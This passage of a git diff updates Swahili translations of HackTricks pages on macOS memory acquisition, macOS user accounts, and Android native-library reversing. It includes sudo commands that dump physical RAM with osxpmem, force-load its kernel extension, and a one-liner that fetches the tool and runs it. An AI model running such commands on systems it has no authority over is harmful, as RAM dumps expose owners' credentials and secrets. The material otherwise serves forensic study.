<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,42 +1,56 @@
# Kupata Kumbukumbu za macOS
# Kudondosha Kumbukumbu za Kumbukumbu za macOS
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Vitu vya Kumbukumbu
### Faili za Kubadilishana
Faili za kubadilishana, kama vile `/private/var/vm/swapfile0`, hutumika kama **hifadhi wakati kumbukumbu ya kimwili imejaa**. Wakati hakuna nafasi zaidi katika kumbukumbu ya kimwili, data yake hutiwa kwenye faili ya kubadilishana na kisha hurudishwa kwenye kumbukumbu ya kimwili kama inavyohitajika. Inaweza kuwepo faili nyingi za kubadilishana, zenye majina kama swapfile0, swapfile1, na kadhalika.
Faili za kubadilishana, kama vile `/private/var/vm/swapfile0`, hutumika kama **akiba wakati kumbukumbu ya kimwili imejaa**. Wakati hakuna nafasi zaidi katika kumbukumbu ya kimwili, data yake inahamishwa kwenye faili ya kubadilishana na kisha kurudishwa kwenye kumbukumbu ya kimwili kama inavyohitajika. Inaweza kuwepo faili nyingi za kubadilishana, zenye majina kama swapfile0, swapfile1, na kadhalika.
### Picha ya Kuhifadhi
### Picha ya Kulala
Faili iliyo katika eneo la `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya kulala**. **Data kutoka kwenye kumbukumbu huhifadhiwa kwenye faili hii wakati OS X inalala**. Wakati kompyuta inapoamka, mfumo unapata data ya kumbukumbu kutoka kwenye faili hii, kuruhusu mtumiaji kuendelea pale walipoishia.
Faili iliyoko kwenye `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya kulala**. **Data kutoka kumbukumbu inahifadhiwa kwenye faili hii wakati OS X inalala**. Wakati wa kuamsha kompyuta, mfumo unapata data ya kumbukumbu kutoka kwenye faili hii, kuruhusu mtumiaji kuendelea pale walipoishia.
Ni muhimu kufahamu kuwa kwenye mifumo ya MacOS ya kisasa, faili hii kwa kawaida imefichwa kwa sababu za usalama, hivyo kufanya kupona kuwa ngumu.
Ni muhimu kutambua kwamba kwenye mifumo ya MacOS ya kisasa, faili hii kawaida imefichwa kwa sababu za usalama, ikifanya kupona kuwa ngumu.
* Ili kuthibitisha ikiwa ufunuo umewezeshwa kwa sleepimage, amri `sysctl vm.swapusage` inaweza kutumika. Hii itaonyesha ikiwa faili imefichwa.
* Ili kuthibitisha ikiwa uchawi umewezeshwa kwa sleepimage, amri `sysctl vm.swapusage` inaweza kutumika. Hii itaonyesha ikiwa faili imefichwa.
### Kumbukumbu za Shinikizo la Kumbukumbu
### Kumbukumbu ya Shinikizo la Kumbukumbu
Faili nyingine muhimu inayohusiana na kumbukumbu kwenye mifumo ya MacOS ni **kumbukumbu ya shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina habari za kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo la kumbukumbu. Zinaweza kuwa na manufaa hasa katika kutambua matatizo yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda.
Faili nyingine muhimu inayohusiana na kumbukumbu kwenye mifumo ya MacOS ni **kumbukumbu ya shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina habari za kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo. Zinaweza kuwa muhimu hasa kwa kugundua masuala yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda.
## Kupata kumbukumbu kwa kutumia osxpmem
## Kudondosha kumbukumbu na osxpmem
Ili kupata kumbukumbu kwenye kifaa cha MacOS, unaweza kutumia [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
Ili kudondosha kumbukumbu kwenye kompyuta ya MacOS unaweza kutumia [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
**Note**: Maelekezo yafuatayo yatafanya kazi tu kwa Macs zenye muundo wa Intel. Zana hii sasa imehifadhiwa na toleo la mwisho lilikuwa mwaka 2017. Programu tumizi iliyopakuliwa kwa kutumia maelekezo yaliyotolewa hapa inalenga vifaa vya Intel kwani Apple Silicon haikuwepo mwaka 2017. Inaweza kuwa inawezekana kuunda programu tumizi kwa muundo wa arm64 lakini utalazimika kujaribu mwenyewe.
**Maelezo**: Maelekezo yafuatayo yatafanya kazi kwa Macs zenye muundo wa Intel tu. Zana hii sasa imehifadhiwa na toleo la mwisho lilikuwa mwaka 2017. Binari iliyopakuliwa kwa kutumia maelekezo yaliyotolewa inalenga chips za Intel kwani Apple Silicon haikuwepo mwaka 2017. Inaweza kuwa inawezekana kuchakata binari kwa muundo wa arm64 lakini utalazimika kujaribu mwenyewe.
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -44,16 +58,16 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
#Dump aff4 format
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
```
Ikiwa utapata kosa hili: `osxpmem.app/MacPmem.kext haikufanikiwa kupakia - (libkern/kext) kushindwa kwa uthibitisho (umiliki wa faili/ruhusa); angalia magogo ya mfumo/kernel kwa makosa au jaribu kextutil(8)` Unaweza kulitatua kwa kufanya:
Ikiwa unapata kosa hili: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Unaweza kulitatua kwa kufanya:
```bash
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
sudo kextutil "/tmp/MacPmem.kext"
#Allow the kext in "Security & Privacy --> General"
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
**Makosa mengine** yanaweza kurekebishwa kwa **kuruhusu mzigo wa kext** katika "Usalama na Faragha --> Jumla", tu **ruhusu**.
**Makosa mengine** yanaweza kusuluhishwa kwa **kuruhusu mzigo wa kext** katika "Usalama & Faragha --> Jumla", tu **ruhusu**.
Unaweza pia kutumia **oneliner** hii kupakua programu, kupakia kext na kudump kumbukumbu:
Unaweza pia kutumia hii **oneliner** kupakua programu, kuruhusu kext na kudondosha kumbukumbu:
{% code overflow="wrap" %}
```bash
@ -62,16 +76,28 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
```
{% endcode %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,26 +2,40 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
### Watumiaji wa Kawaida
* **Daemon**: Mtumiaji aliyeandaliwa kwa ajili ya daemons ya mfumo. Majina ya akaunti za daemons ya chaguo-msingi kawaida huanza na "\_":
* **Daemon**: Mtumiaji aliyeandaliwa kwa ajili ya daemons za mfumo. Majina ya akaunti za daemons za chaguo-msingi kawaida huanza na "\_":
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
```
* **Guest**: Akaunti kwa wageni wenye ruhusa kali sana
* **Mgeni**: Akaunti kwa wageni wenye ruhusa kali
{% code overflow="wrap" %}
```bash
@ -30,26 +44,12 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
```
{% endcode %}
* **Hakuna mtu**: Mchakato unatekelezwa na mtumiaji huyu wakati idhini ndogo inahitajika
* **Hakuna mtu**: Mchakato unatekelezwa na mtumiaji huyu wakati idhini chache zinahitajika
* **Root**
### Uwezo wa Mtumiaji
### Mamlaka ya Mtumiaji
* **Mtumiaji wa Kawaida**: Mtumiaji wa msingi kabisa. Mtumiaji huyu anahitaji idhini kutoka kwa mtumiaji wa admin wakati anajaribu kufunga programu au kutekeleza kazi zingine za juu. Hawawezi kufanya hivyo peke yao.
* **Mtumiaji wa Admin**: Mtumiaji ambaye kwa kawaida hufanya kazi kama mtumiaji wa kawaida lakini pia anaruhusiwa kufanya vitendo vya root kama vile kufunga programu na kazi zingine za utawala. Watumiaji wote wanaoingia kwenye kikundi cha admin wanapewa **upatikanaji wa root kupitia faili ya sudoers**.
* **Root**: Root ni mtumiaji anayeruhusiwa kufanya vitendo karibu vyovyote (kuna vizuizi vilivyowekwa na ulinzi kama System Integrity Protection).
* Kwa mfano, root hawezi kuweka faili ndani ya `/System`
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
* **Mtumiaji wa Kawaida:** Msingi wa watumiaji. Mtumiaji huyu anahitaji idhini kutoka kwa mtumiaji wa usimamizi anapojaribu kufunga programu au kutekeleza kazi nyingine za juu. Hawawezi kufanya hivyo kwa kujitegemea.
* **Mtumiaji wa Usimamizi**: Mtumiaji ambaye kwa kawaida anafanya kazi kama mtumiaji wa kawaida lakini pia anaruhusiwa kutekeleza vitendo vya msingi kama vile kufunga programu na kazi nyingine za usimamizi. Wote wanaoingia kwenye kikundi cha usimamizi wanapewa **upatikanaji wa root kupitia faili ya sudoers**.
* **Root**: Root ni mtumiaji anayeruhusiwa kutekeleza karibu kitendo chochote (kuna vizuizi vilivyowekwa na ulinzi kama Ulinzi wa Uadilifu wa Mfumo).
* Kwa mfano root hataweza kuweka faili ndani ya `/System`

View file

@ -6,43 +6,57 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
**Kwa habari zaidi angalia: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
Programu za Android zinaweza kutumia maktaba za asili, kawaida zimeandikwa kwa C au C++, kwa kazi zenye utendaji mkubwa. Waundaji wa programu hasidi pia hutumia maktaba hizi, kwani ni ngumu kuzirekebisha kuliko kanuni ya DEX. Sehemu hii inasisitiza ujuzi wa kurekebisha nyuma uliozingatia Android, badala ya kufundisha lugha za mkutano. Toleo la ARM na x86 la maktaba linapatikana kwa utangamano.
Programu za Android zinaweza kutumia maktaba za asili, kwa kawaida zilizoandikwa kwa C au C++, kwa kazi za msingi za utendaji. Wabunifu wa programu hasidi pia hutumia maktaba hizi, kwani ni ngumu kuzigeuza kuliko bytecode ya DEX. Sehemu hii inasisitiza ujuzi wa kugeuza maktaba za asili zilizobinafsishwa kwa Android, badala ya kufundisha lugha za mkutano. Toleo la ARM na x86 la maktaba hutolewa kwa utangamano.
### Mambo Muhimu:
- **Maktaba za Asili katika Programu za Android:**
- Hutumiwa kwa kazi zenye utendaji mkubwa.
- Zimeandikwa kwa C au C++, hivyo kurekebisha nyuma kunakuwa changamoto.
- Zinapatikana katika muundo wa `.so` (kitu kinachoshirikiwa), kama vile programu za Linux.
- Waundaji wa programu hasidi wanapendelea kanuni ya asili ili kufanya uchambuzi kuwa mgumu zaidi.
- Hutumiwa kwa kazi zenye mahitaji makubwa ya utendaji.
- Zimeandikwa kwa C au C++, hivyo kugeuza ni changamoto.
- Zinapatikana katika muundo wa `.so` (faili za kushirikishwa), sawa na programu za Linux.
- Wabunifu wa malware wanapendelea nambari za asili ili kufanya uchambuzi kuwa mgumu.
- **Java Native Interface (JNI) & Android NDK:**
- JNI inaruhusu njia za Java zitekelezwe kwa kutumia kanuni ya asili.
- NDK ni seti maalum ya zana za Android za kuandika kanuni ya asili.
- JNI na NDK hufanya mawasiliano kati ya kanuni ya Java (au Kotlin) na maktaba za asili.
- **Kiolesura cha Java Native (JNI) & NDK ya Android:**
- JNI inaruhusu njia za Java kutekelezwa kwa nambari za asili.
- NDK ni seti ya zana maalum ya Android kutunga nambari za asili.
- JNI na NDK hupitisha nambari za Java (au Kotlin) na maktaba za asili.
- **Kupakia na Kutekeleza Maktaba:**
- Maktaba hupakiwa kwenye kumbukumbu kwa kutumia `System.loadLibrary` au `System.load`.
- JNI_OnLoad inatekelezwa wakati wa kupakia maktaba.
- Njia za asili zilizotangazwa katika Java zinaunganishwa na kazi za asili, kuruhusu utekelezaji.
- Njia za asili zilizotangazwa kwa Java zinahusishwa na kazi za asili, kuruhusu utekelezaji.
- **Kuunganisha Njia za Java na Kazi za Asili:**
- **Unganishaji wa Kudumu:** Majina ya kazi katika maktaba za asili yanalingana na muundo maalum, kuruhusu kuunganisha moja kwa moja.
- **Unganishaji wa Stesheni:** Hutumia `RegisterNatives` kwa unganishaji, hutoa uwezo wa kubadilisha majina na muundo wa kazi.
- **Unganishaji wa Kudumu:** Majina ya kazi katika maktaba za asili yanalingana na muundo maalum, kuruhusu uunganishaji wa moja kwa moja.
- **Unganishaji wa Stesheni:** Hutumia `RegisterNatives` kwa uunganishaji, kutoa mabadiliko katika majina ya kazi na muundo.
- **Zana na Mbinu za Kurekebisha Nyuma:**
- **Zana na Mbinu za Kugeuza:**
- Zana kama Ghidra na IDA Pro husaidia kuchambua maktaba za asili.
- `JNIEnv` ni muhimu kwa kuelewa kazi na mwingiliano wa JNI.
- Zoezi zinapatikana ili kujifunza kupakia maktaba, kuunganisha njia, na kutambua kazi za asili.
- `JNIEnv` ni muhimu kwa kuelewa njia za JNI na mwingiliano.
- Mazoezi yanatolewa kufanya mazoezi ya kupakia maktaba, kuunganisha njia, na kutambua kazi za asili.
### Vyanzo:
- **Kujifunza Mkutano wa ARM:**
@ -54,19 +68,5 @@ Programu za Android zinaweza kutumia maktaba za asili, kawaida zimeandikwa kwa C
- [Vidokezo vya JNI vya Android](https://developer.android.com/training/articles/perf-jni)
- [Kuanza na NDK](https://developer.android.com/ndk/guides/)
- **Kurekebisha Nyuma Maktaba za Asili:**
- [Kurekebisha Nyuma Maktaba za Asili za Android Kwa Kutumia JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
- **Kupeleleza Maktaba za Asili:**
- [Kupeleleza Maktaba za Asili za Android Kwa Kutumia JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)

View file

@ -9,11 +9,25 @@ Njia nyingine za kusaidia HackTricks:
